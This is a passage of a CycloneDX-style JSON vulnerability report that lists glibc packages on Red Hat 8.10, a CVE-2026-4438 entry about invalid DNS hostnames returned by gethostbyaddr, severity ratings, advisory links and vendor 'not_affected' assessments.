              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-4438",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        20,
        88
      ],
      "description": "Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C library version 2.34 to version 2.43 could result in an invalid DNS hostname being returned to the caller in violation of the DNS specification.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4438"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19061"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20597"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4438"
        },
        {
          "url": "https://bugzilla.redhat.com/2449777"
        },
        {
          "url": "https://bugzilla.redhat.com/2449783"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449777"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449783"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453117"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4046"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4437"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4438"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19061.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:20597"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-4438.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-500006.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4438"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34015"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8611-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4438"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/03/23/2"
        }
      ],
      "published": "2026-03-20T20:16:49+00:00",
      "updated": "2026-07-14T13:18:58+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-44431",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
